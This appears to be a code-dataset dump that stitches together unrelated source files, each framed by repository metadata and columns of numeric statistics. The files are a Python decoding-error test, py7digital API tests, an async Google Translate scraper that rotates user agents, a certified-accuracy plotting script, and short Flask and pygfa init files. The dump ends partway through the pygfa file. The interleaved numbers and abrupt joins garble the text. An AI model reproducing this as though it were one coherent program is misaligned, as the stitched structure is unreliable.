00b5e51793097544ba9b75c97a0d30e63970bf45
|
[
"MIT"
] | 572
|
2018-04-03T03:17:08.000Z
|
2022-03-31T19:05:32.000Z
|
codigo/Live34/errors/test.py
|
cassiasamp/live-de-python
|
00b5e51793097544ba9b75c97a0d30e63970bf45
|
[
"MIT"
] | 176
|
2018-05-18T15:56:16.000Z
|
2022-03-28T20:39:07.000Z
|
codigo/Live34/errors/test.py
|
cassiasamp/live-de-python
|
00b5e51793097544ba9b75c97a0d30e63970bf45
|
[
"MIT"
] | 140
|
2018-04-18T13:59:11.000Z
|
2022-03-29T00:43:49.000Z
|
print(open('teste_win1252.txt', errors='strict').read())
print(open('teste_win1252.txt', errors='replace').read())
print(open('teste_win1252.txt', errors='ignore').read())
print(open('teste_win1252.txt', errors='surrogateescape').read())
print(open('teste_win1252.txt', errors='backslashreplace').read())
| 50.833333
| 66
| 0.737705
| 40
| 305
| 5.5
| 0.3
| 0.204545
| 0.318182
| 0.477273
| 0.754545
| 0.754545
| 0.618182
| 0
| 0
| 0
| 0
| 0.067797
| 0.032787
| 305
| 5
| 67
| 61
| 0.677966
| 0
| 0
| 0
| 0
| 0
| 0.442623
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
8ec04b48af6e767205faa527b644561798afc507
| 3,304
|
py
|
Python
|
tests/search_acceptance_tests.py
|
7digital/python-7digital-api
|
cfb9b996dafe36ae5b00af3986531c1b3387cb2f
|
[
"MIT"
] | 1
|
2018-06-24T08:28:27.000Z
|
2018-06-24T08:28:27.000Z
|
tests/search_acceptance_tests.py
|
7digital/python-7digital-api
|
cfb9b996dafe36ae5b00af3986531c1b3387cb2f
|
[
"MIT"
] | null | null | null |
tests/search_acceptance_tests.py
|
7digital/python-7digital-api
|
cfb9b996dafe36ae5b00af3986531c1b3387cb2f
|
[
"MIT"
] | null | null | null |
import py7digital
#Search artist
results = py7digital.search_artist('stones')
print results.get_total_result_count()
for artist in results.get_next_page():
print artist.get_name() #, artist.get_image(), artist.get_url(), artist.get_tags()
print '\tTop tracks:'
for top_track in artist.get_top_tracks():
print '\t\t', top_track.get_title(), top_track.get_isrc(), top_track.get_duration(), top_track.get_position(), top_track.get_explicit(), top_track.get_version()
print '\tRec. Albums:'
for rec_album in artist.get_recommended_albums():
print '\t\t', rec_album, rec_album.get_year() #, album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label()
for album in artist.get_albums(5):
print '\t', album, album.get_year(), album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label(), album.get_release_date(), album.get_added_date()
for sim_album in album.get_similar():
print '\t\tSimilar:', sim_album, sim_album.get_year(), sim_album.get_artist()
for track in album.get_tracks():
print '\t\t', track, track.get_isrc() #, track.get_url(), track.get_audio()
#Browse artists starting with 'J'
results = py7digital.browse_artists('j')
print results.get_total_result_count()
for artist in results.get_next_page():
print artist.get_name() #, artist.get_image(), artist.get_url(), artist.get_tags()
for album in artist.get_albums(2):
print '\t', album, album.get_year() #album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label()
for track in album.get_tracks():
print '\t\t', track.get_title(), track.get_isrc() #, track.get_url(), track.get_audio()
#Search albums
searcher = py7digital.search_album('u2')
print searcher.get_total_result_count()
while searcher.has_results():
for album in searcher.get_next_page():
print album, album.get_similar()
#Search tracks
searcher = py7digital.search_track('u2 one')
print searcher.get_total_result_count()
while searcher.has_results():
for track in searcher.get_next_page():
print track
# New releases in a given period of time
results = py7digital.album_releases('20100901', '20100924')
for album in results.get_next_page():
print album, album.get_year(), album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label(), album.get_release_date(), album.get_added_date()
for sim_album in album.get_similar():
print '\tSimilar:', sim_album, sim_album.get_year(), sim_album.get_artist()
for track in album.get_tracks():
print '\t', track, track.get_isrc() #, track.get_url(), track.get_audio()
# Album charts in a given period of time
results = py7digital.album_charts('month', '20100901')
for album in results.get_next_page():
print album, album.get_year(), album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label(), album.get_release_date(), album.get_added_date()
for sim_album in album.get_similar():
print '\tSimilar:', sim_album, sim_album.get_year(), sim_album.get_artist()
for track in album.get_tracks():
print '\t', track, track.get_isrc() #, track.get_url(), track.get_audio()
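# The script above uses Python 2 print statements throughout. For reference,
# a minimal Python 3 form of the first search loop, with the py7digital API
# exactly as exercised above:
#
#     results = py7digital.search_artist('stones')
#     print(results.get_total_result_count())
#     for artist in results.get_next_page():
#         print(artist.get_name())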
| 52.444444
| 189
| 0.712772
| 496
| 3,304
| 4.459677
| 0.139113
| 0.180832
| 0.0434
| 0.0434
| 0.756781
| 0.756781
| 0.719259
| 0.706148
| 0.706148
| 0.651899
| 0
| 0.012337
| 0.141344
| 3,304
| 62
| 190
| 53.290323
| 0.76736
| 0.18069
| 0
| 0.510204
| 0
| 0
| 0.047177
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.020408
| null | null | 0.469388
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d95538d11eb5d122f25ddb986c4b20f8d87aa375
| 11,429
|
py
|
Python
|
baikeSpider/google_translate/translate.py
|
pluto-junzeng/baiduSpider
|
ea591920cd0994e83e36f033f98c6cc6859141d6
|
[
"Apache-2.0"
] | 13
|
2020-12-07T03:19:12.000Z
|
2022-01-19T13:02:41.000Z
|
baikeSpider/google_translate/translate.py
|
zengjunjun/baiduSpider
|
ea591920cd0994e83e36f033f98c6cc6859141d6
|
[
"Apache-2.0"
] | null | null | null |
baikeSpider/google_translate/translate.py
|
zengjunjun/baiduSpider
|
ea591920cd0994e83e36f033f98c6cc6859141d6
|
[
"Apache-2.0"
] | 3
|
2021-07-10T08:24:55.000Z
|
2022-01-19T13:02:43.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author:lichunhui
@Time: 2018/7/19 16:05
@Description: Translate English text with Google Translate
"""
import urllib.request
import urllib.parse
import execjs
import random
import json
import asyncio
from aiohttp import ClientSession
from baikeSpider.settings import MY_USER_AGENT
from ..logger import download_logger
__all__ = ['GoogleTranslate']
class Py4Js(object):
""" 执行js脚本计算出tk值 """
def __init__(self):
self.ctx = execjs.compile(
"""
function TL(a) {
var k = "";
var b = 406644;
var b1 = 3293161072;
var jd = ".";
var $b = "+-a^+6";
var Zb = "+-3^+b+-f";
for (var e = [], f = 0, g = 0; g < a.length; g++) {
var m = a.charCodeAt(g);
128 > m ? e[f++] = m : (2048 > m ? e[f++] = m >> 6 | 192 : (55296 == (m & 64512) && g + 1 < a.length && 56320 == (a.charCodeAt(g + 1) & 64512) ? (m = 65536 + ((m & 1023) << 10) + (a.charCodeAt(++g) & 1023),
e[f++] = m >> 18 | 240,
e[f++] = m >> 12 & 63 | 128) : e[f++] = m >> 12 | 224,
e[f++] = m >> 6 & 63 | 128),
e[f++] = m & 63 | 128)
}
a = b;
for (f = 0; f < e.length; f++) a += e[f],
a = RL(a, $b);
a = RL(a, Zb);
a ^= b1 || 0;
0 > a && (a = (a & 2147483647) + 2147483648);
a %= 1E6;
return a.toString() + jd + (a ^ b)
};
function RL(a, b) {
var t = "a";
var Yb = "+";
for (var c = 0; c < b.length - 2; c += 3) {
var d = b.charAt(c + 2),
d = d >= t ? d.charCodeAt(0) - 87 : Number(d),
d = b.charAt(c + 1) == Yb ? a >>> d: a << d;
a = b.charAt(c) == Yb ? a + d & 4294967295 : a ^ d
}
return a
}
""")
def getTk(self, text):
return self.ctx.call("TL", text)
class GoogleTranslate(object):
""" 调用谷歌翻译api """
def __init__(self):
self.js = Py4Js()
async def open_url(self, url, header, sem):
async with ClientSession() as session:
async with sem:
data = ''
try:
async with session.post(url=url, headers=header) as response:
response = await response.read()
data = response.decode('utf8')
except TimeoutError as e:
print(e)
download_logger.error("google translate timeout: {} ".format(e))
finally:
return data
def translate(self, content):
length = len(content)  # length of the input text
sem = asyncio.Semaphore(50)
loop = asyncio.get_event_loop()
tasks = []
n = length // 5000  # number of 5000-character chunks to translate
remainder = length % 5000  # characters left over after the full chunks
if remainder > 0:
n += 1
for i in range(1, n + 1):
splitContent = content[5000 * (i - 1):5000 * i]
# print("第%s次分割后的结果,此次长度为%s" % (i, len(splitContent)))
tk = self.js.getTk(splitContent)
splitContent = urllib.parse.quote(splitContent)
headers = {'User-Agent': self.randomAgent()}
url = "http://translate.google.cn/translate_a/single?client=t" \
"&sl=en&tl=zh-CN&hl=zh-CN&dt=at&dt=bd&dt=ex&dt=ld&dt=md&dt=qca" \
"&dt=rw&dt=rm&dt=ss&dt=t&ie=UTF-8&oe=UTF-8&clearbtn=1&otf=1&pc=1" \
"&srcrom=0&ssel=0&tsel=0&kc=2&tk=%s&q=%s" % (tk, splitContent)
tasks.append(asyncio.ensure_future(self.open_url(url, headers, sem)))
res_list = loop.run_until_complete(asyncio.gather(*tasks))
result = ""
for res in res_list:
result += self.parse_json(res)
# print(result)
return result
@staticmethod
def parse_json(data):
result = ''
if data:
jsns = json.loads(data)[0]
for lst in jsns:
if not lst[0]:
continue
result += lst[0]
return result
@staticmethod
def randomAgent():
agent_pools = MY_USER_AGENT
return random.sample(agent_pools, 1)[0]
if __name__ == '__main__':
import time
gl = GoogleTranslate()
c = '''
President Donald Trump should work to form a "cyber NATO" in response to the Russian attack on the 2016 US elections and to prevent more cyber attacks, Rep. Joaquin Castro said Wednesday, even though NATO already cooperates on cybersecurity.
"He should be engaging with our allies to basically form a version of a cyber NATO, where with our allies, our close allies, we agree to essentially mutual defense in cyberspace and, if necessary, mutual cyber response," the Texas Democrat said in an interview with CNN's Wolf Blitzer on "The Situation Room."
According to a NATO fact sheet on cyber defense, NATO allies agreed to work together on cybersecurity in 2014."To keep pace with the rapidly changing threat landscape, NATO adopted an enhanced policy and action plan on cyber defence, endorsed by Allies at the Wales Summit in September 2014," the document reads. "The policy establishes that cyber defence is part of the Alliance's core task of collective defence, confirms that international law applies in cyberspace and intensifies NATO's cooperation with industry."
Castro also called for additional cybersecurity measures domestically.Trump should be "investing in greater election security and having the Congress work with state governments to pass laws to establish even a basic level of cybersecurity protection and election protection for our voting systems," he said. "Right now there isn't a single law -- and I can't find a state law -- that does that."
Castro also questioned Trump's commitment to protecting the US from attacks."Right now, quite honestly, it doesn't look like the President is fully committed to keeping the United States safe from Russian interference," he said.
President Donald Trump should work to form a "cyber NATO" in response to the Russian attack on the 2016 US elections and to prevent more cyber attacks, Rep. Joaquin Castro said Wednesday, even though NATO already cooperates on cybersecurity.
"He should be engaging with our allies to basically form a version of a cyber NATO, where with our allies, our close allies, we agree to essentially mutual defense in cyberspace and, if necessary, mutual cyber response," the Texas Democrat said in an interview with CNN's Wolf Blitzer on "The Situation Room."
According to a NATO fact sheet on cyber defense, NATO allies agreed to work together on cybersecurity in 2014."To keep pace with the rapidly changing threat landscape, NATO adopted an enhanced policy and action plan on cyber defence, endorsed by Allies at the Wales Summit in September 2014," the document reads. "The policy establishes that cyber defence is part of the Alliance's core task of collective defence, confirms that international law applies in cyberspace and intensifies NATO's cooperation with industry."
Castro also called for additional cybersecurity measures domestically.Trump should be "investing in greater election security and having the Congress work with state governments to pass laws to establish even a basic level of cybersecurity protection and election protection for our voting systems," he said. "Right now there isn't a single law -- and I can't find a state law -- that does that."
Castro also questioned Trump's commitment to protecting the US from attacks."Right now, quite honestly, it doesn't look like the President is fully committed to keeping the United States safe from Russian interference," he said.
President Donald Trump should work to form a "cyber NATO" in response to the Russian attack on the 2016 US elections and to prevent more cyber attacks, Rep. Joaquin Castro said Wednesday, even though NATO already cooperates on cybersecurity.
"He should be engaging with our allies to basically form a version of a cyber NATO, where with our allies, our close allies, we agree to essentially mutual defense in cyberspace and, if necessary, mutual cyber response," the Texas Democrat said in an interview with CNN's Wolf Blitzer on "The Situation Room."
According to a NATO fact sheet on cyber defense, NATO allies agreed to work together on cybersecurity in 2014."To keep pace with the rapidly changing threat landscape, NATO adopted an enhanced policy and action plan on cyber defence, endorsed by Allies at the Wales Summit in September 2014," the document reads. "The policy establishes that cyber defence is part of the Alliance's core task of collective defence, confirms that international law applies in cyberspace and intensifies NATO's cooperation with industry."
Castro also called for additional cybersecurity measures domestically.Trump should be "investing in greater election security and having the Congress work with state governments to pass laws to establish even a basic level of cybersecurity protection and election protection for our voting systems," he said. "Right now there isn't a single law -- and I can't find a state law -- that does that."
Castro also questioned Trump's commitment to protecting the US from attacks."Right now, quite honestly, it doesn't look like the President is fully committed to keeping the United States safe from Russian interference," he said.
President Donald Trump should work to form a "cyber NATO" in response to the Russian attack on the 2016 US elections and to prevent more cyber attacks, Rep. Joaquin Castro said Wednesday, even though NATO already cooperates on cybersecurity.
"He should be engaging with our allies to basically form a version of a cyber NATO, where with our allies, our close allies, we agree to essentially mutual defense in cyberspace and, if necessary, mutual cyber response," the Texas Democrat said in an interview with CNN's Wolf Blitzer on "The Situation Room."
According to a NATO fact sheet on cyber defense, NATO allies agreed to work together on cybersecurity in 2014."To keep pace with the rapidly changing threat landscape, NATO adopted an enhanced policy and action plan on cyber defence, endorsed by Allies at the Wales Summit in September 2014," the document reads. "The policy establishes that cyber defence is part of the Alliance's core task of collective defence, confirms that international law applies in cyberspace and intensifies NATO's cooperation with industry."
Castro also called for additional cybersecurity measures domestically.Trump should be "investing in greater election security and having the Congress work with state governments to pass laws to establish even a basic level of cybersecurity protection and election protection for our voting systems," he said. "Right now there isn't a single law -- and I can't find a state law -- that does that."
Castro also questioned Trump's commitment to protecting the US from attacks."Right now, quite honestly, it doesn't look like the President is fully committed to keeping the United States safe from Russian interference," he said.&&
'''
print(len(c))
start = time.time()
gl.translate(c)
end = time.time()
print("总共耗时%s秒" % (end - start))
# for i in range(10):
# print(gl.randomAgent())
| 67.627219
| 519
| 0.6704
| 1,671
| 11,429
| 4.561341
| 0.20766
| 0.002362
| 0.010496
| 0.013645
| 0.723695
| 0.721595
| 0.721595
| 0.721595
| 0.721595
| 0.721595
| 0
| 0.028312
| 0.249016
| 11,429
| 168
| 520
| 68.029762
| 0.859723
| 0.024149
| 0
| 0.25
| 0
| 0.23
| 0.736062
| 0.016891
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06
| false
| 0.04
| 0.1
| 0.01
| 0.23
| 0.03
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9822178e1654276908ec086bfeb4c1abf9ded8c
| 12,688
|
py
|
Python
|
pytorch_ares/third_party/hydra/locuslab_smoothing/analyze.py
|
thu-ml/realsafe
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 107
|
2020-06-15T09:55:11.000Z
|
2020-12-20T11:27:11.000Z
|
pytorch_ares/third_party/hydra/locuslab_smoothing/analyze.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 7
|
2020-06-14T03:00:18.000Z
|
2020-12-07T07:10:10.000Z
|
pytorch_ares/third_party/hydra/locuslab_smoothing/analyze.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 19
|
2020-06-14T08:35:33.000Z
|
2020-12-19T13:43:41.000Z
|
import numpy as np
import matplotlib
# matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
from typing import List
import pandas as pd
import seaborn as sns
import math
sns.set()
class Accuracy(object):
def at_radii(self, radii: np.ndarray):
raise NotImplementedError()
class ApproximateAccuracy(Accuracy):
def __init__(self, data_file_path: str):
self.data_file_path = data_file_path
def at_radii(self, radii: np.ndarray) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return np.array([self.at_radius(df, radius) for radius in radii])
def at_radius(self, df: pd.DataFrame, radius: float):
return (df["correct"] & (df["radius"] >= radius)).mean()
class HighProbAccuracy(Accuracy):
def __init__(self, data_file_path: str, alpha: float, rho: float):
self.data_file_path = data_file_path
self.alpha = alpha
self.rho = rho
def at_radii(self, radii: np.ndarray) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return np.array([self.at_radius(df, radius) for radius in radii])
def at_radius(self, df: pd.DataFrame, radius: float):
mean = (df["correct"] & (df["radius"] >= radius)).mean()
num_examples = len(df)
return (
mean
- self.alpha
- math.sqrt(
self.alpha * (1 - self.alpha) * math.log(1 / self.rho) / num_examples
)
- math.log(1 / self.rho) / (3 * num_examples)
)
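# HighProbAccuracy.at_radius returns a conservative high-probability lower
# bound on certified accuracy: the empirical mean minus alpha (the
# per-example certification failure rate) and two Bernstein-style
# concentration terms, so the bound should hold with probability at least
# 1 - rho over the num_examples test points.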
class Line(object):
def __init__(
self, quantity: Accuracy, legend: str, plot_fmt: str = "", scale_x: float = 1
):
self.quantity = quantity
self.legend = legend
self.plot_fmt = plot_fmt
self.scale_x = scale_x
def plot_certified_accuracy(
outfile: str,
title: str,
max_radius: float,
lines: List[Line],
radius_step: float = 0.01,
) -> None:
radii = np.arange(0, max_radius + radius_step, radius_step)
plt.figure()
for line in lines:
plt.plot(radii * line.scale_x, line.quantity.at_radii(radii), line.plot_fmt)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("radius", fontsize=16)
plt.ylabel("certified accuracy", fontsize=16)
plt.legend([method.legend for method in lines], loc="upper right", fontsize=16)
plt.savefig(outfile + ".pdf")
plt.tight_layout()
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
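# Note the save order above: the PDF is written before the title is set and
# the PNG after, so the PDF comes out untitled (handy for papers) while the
# PNG keeps its title. Illustrative usage, with a hypothetical data path:
#
#   plot_certified_accuracy(
#       "analysis/plots/example", "example", 1.5,
#       [Line(ApproximateAccuracy("data/certify/example.tsv"), "example")],
#   )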
def smallplot_certified_accuracy(
outfile: str,
title: str,
max_radius: float,
methods: List[Line],
radius_step: float = 0.01,
xticks=0.5,
) -> None:
radii = np.arange(0, max_radius + radius_step, radius_step)
plt.figure()
for method in methods:
plt.plot(radii, method.quantity.at_radii(radii), method.plot_fmt)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.xlabel("radius", fontsize=22)
plt.ylabel("certified accuracy", fontsize=22)
plt.tick_params(labelsize=20)
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(xticks))
plt.legend([method.legend for method in methods], loc="upper right", fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.close()
def latex_table_certified_accuracy(
outfile: str,
radius_start: float,
radius_stop: float,
radius_step: float,
methods: List[Line],
):
radii = np.arange(radius_start, radius_stop + radius_step, radius_step)
accuracies = np.zeros((len(methods), len(radii)))
for i, method in enumerate(methods):
accuracies[i, :] = method.quantity.at_radii(radii)
    with open(outfile, "w") as f:
        for radius in radii:
            f.write("& $r = {:.3}$".format(radius))
        f.write("\\\\\n")
        f.write("\\midrule\n")
        for i, method in enumerate(methods):
            f.write(method.legend)
            for j, radius in enumerate(radii):
                if i == accuracies[:, j].argmax():
                    txt = r" & \textbf{" + "{:.2f}".format(accuracies[i, j]) + "}"
                else:
                    txt = " & {:.2f}".format(accuracies[i, j])
                f.write(txt)
            f.write("\\\\\n")
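# Roughly the LaTeX fragment emitted for two methods and radii 0.25/0.5
# (accuracy numbers made up for illustration):
#
#   & $r = 0.25$& $r = 0.5$\\
#   \midrule
#   method A & \textbf{0.60} & 0.42\\
#   method B & 0.55 & \textbf{0.43}\\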
def markdown_table_certified_accuracy(
outfile: str,
radius_start: float,
radius_stop: float,
radius_step: float,
methods: List[Line],
):
radii = np.arange(radius_start, radius_stop + radius_step, radius_step)
accuracies = np.zeros((len(methods), len(radii)))
for i, method in enumerate(methods):
accuracies[i, :] = method.quantity.at_radii(radii)
    with open(outfile, "w") as f:
        f.write("| | ")
        for radius in radii:
            f.write("r = {:.3} |".format(radius))
        f.write("\n")
        f.write("| --- | ")
        for i in range(len(radii)):
            f.write(" --- |")
        f.write("\n")
        for i, method in enumerate(methods):
            f.write("<b> {} </b>| ".format(method.legend))
            for j, radius in enumerate(radii):
                if i == accuracies[:, j].argmax():
                    txt = "{:.2f}<b>*</b> |".format(accuracies[i, j])
                else:
                    txt = "{:.2f} |".format(accuracies[i, j])
                f.write(txt)
            f.write("\n")
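# The markdown variant renders the same comparison as a pipe table, e.g.:
#
#   | | r = 0.25 |r = 0.5 |
#   | --- |  --- | --- |
#   <b> method A </b>| 0.60<b>*</b> |0.42 |
#
# where <b>*</b> marks the best method at each radius (numbers illustrative).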
if __name__ == "__main__":
latex_table_certified_accuracy(
"analysis/latex/vary_noise_cifar10",
0.25,
1.5,
0.25,
[
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.12/test/sigma_0.12"
),
"$\sigma = 0.12$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.25/test/sigma_0.25"
),
"$\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.50/test/sigma_0.50"
),
"$\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_1.00/test/sigma_1.00"
),
"$\sigma = 1.00$",
),
],
)
markdown_table_certified_accuracy(
"analysis/markdown/vary_noise_cifar10",
0.25,
1.5,
0.25,
[
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.12/test/sigma_0.12"
),
"σ = 0.12",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.25/test/sigma_0.25"
),
"σ = 0.25",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.50/test/sigma_0.50"
),
"σ = 0.50",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_1.00/test/sigma_1.00"
),
"σ = 1.00",
),
],
)
latex_table_certified_accuracy(
"analysis/latex/vary_noise_imagenet",
0.5,
3.0,
0.5,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.25/test/sigma_0.25"
),
"$\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"$\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_1.00/test/sigma_1.00"
),
"$\sigma = 1.00$",
),
],
)
markdown_table_certified_accuracy(
"analysis/markdown/vary_noise_imagenet",
0.5,
3.0,
0.5,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.25/test/sigma_0.25"
),
"σ = 0.25",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"σ = 0.50",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_1.00/test/sigma_1.00"
),
"σ = 1.00",
),
],
)
plot_certified_accuracy(
"analysis/plots/vary_noise_cifar10",
"CIFAR-10, vary $\sigma$",
1.5,
[
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.12/test/sigma_0.12"
),
"$\sigma = 0.12$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.25/test/sigma_0.25"
),
"$\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.50/test/sigma_0.50"
),
"$\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_1.00/test/sigma_1.00"
),
"$\sigma = 1.00$",
),
],
)
plot_certified_accuracy(
"analysis/plots/vary_train_noise_cifar_050",
"CIFAR-10, vary train noise, $\sigma=0.5$",
1.5,
[
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.25/test/sigma_0.50"
),
"train $\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.50/test/sigma_0.50"
),
"train $\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_1.00/test/sigma_0.50"
),
"train $\sigma = 1.00$",
),
],
)
plot_certified_accuracy(
"analysis/plots/vary_train_noise_imagenet_050",
"ImageNet, vary train noise, $\sigma=0.5$",
1.5,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.25/test/sigma_0.50"
),
"train $\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"train $\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_1.00/test/sigma_0.50"
),
"train $\sigma = 1.00$",
),
],
)
plot_certified_accuracy(
"analysis/plots/vary_noise_imagenet",
"ImageNet, vary $\sigma$",
4,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.25/test/sigma_0.25"
),
"$\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"$\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_1.00/test/sigma_1.00"
),
"$\sigma = 1.00$",
),
],
)
plot_certified_accuracy(
"analysis/plots/high_prob",
"Approximate vs. High-Probability",
2.0,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"Approximate",
),
Line(
HighProbAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50",
0.001,
0.001,
),
"High-Prob",
),
],
)
| 29.714286
| 85
| 0.492276
| 1,315
| 12,688
| 4.593916
| 0.124715
| 0.043701
| 0.125145
| 0.15759
| 0.810793
| 0.785135
| 0.776196
| 0.743089
| 0.705016
| 0.677206
| 0
| 0.059658
| 0.377759
| 12,688
| 426
| 86
| 29.784038
| 0.70551
| 0.001813
| 0
| 0.710997
| 0
| 0
| 0.224135
| 0.155505
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030691
| false
| 0
| 0.017903
| 0.002558
| 0.069054
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7945e83218e926ccf4ced98eb59de90b751562f0
| 68
|
py
|
Python
|
rest-api/flask_app/auth/__init__.py
|
sinedie/Flask-Svelte-Websockets-Nginx-Docker
|
76daeec2c76f9f27ca526f53393ab4363020b92b
|
[
"WTFPL"
] | 4
|
2021-11-21T14:04:15.000Z
|
2022-03-20T15:28:14.000Z
|
rest-api/flask_app/auth/__init__.py
|
sinedie/Utimate-flask-websocket-template
|
76daeec2c76f9f27ca526f53393ab4363020b92b
|
[
"WTFPL"
] | null | null | null |
rest-api/flask_app/auth/__init__.py
|
sinedie/Utimate-flask-websocket-template
|
76daeec2c76f9f27ca526f53393ab4363020b92b
|
[
"WTFPL"
] | null | null | null |
from flask_app.auth.jwt import *
from flask_app.auth.login import *
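# Wildcard re-exports: importing flask_app.auth pulls in every public name
# from flask_app.auth.jwt and flask_app.auth.login (module-level names not
# starting with an underscore, or whatever __all__ lists if those modules
# define one).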
| 22.666667
| 34
| 0.794118
| 12
| 68
| 4.333333
| 0.583333
| 0.346154
| 0.461538
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 3
| 34
| 22.666667
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7948c614a0f5cd66fc523acd84e6f564a708d470
| 411
|
py
|
Python
|
pygfa/graph_element/parser/__init__.py
|
Francesco2304/pygfa
|
9bf6fb5f0a959685300ab863a0e716a2268109f7
|
[
"MIT"
] | 3
|
2020-06-25T22:47:02.000Z
|
2022-02-27T15:16:02.000Z
|
pygfa/graph_element/parser/__init__.py
|
Francesco2304/pygfa
|
9bf6fb5f0a959685300ab863a0e716a2268109f7
|
[
"MIT"
] | 3
|
2017-08-08T12:24:23.000Z
|
2022-02-27T15:17:25.000Z
|
pygfa/graph_element/parser/__init__.py
|
Francesco2304/pygfa
|
9bf6fb5f0a959685300ab863a0e716a2268109f7
|
[
"MIT"
] | 4
|
2019-02-04T20:54:53.000Z
|
2020-05-14T19:52:24.000Z
|
from pygfa.graph_element.parser import header
from pygfa.graph_element.parser import segment
from pygfa.graph_element.parser import link
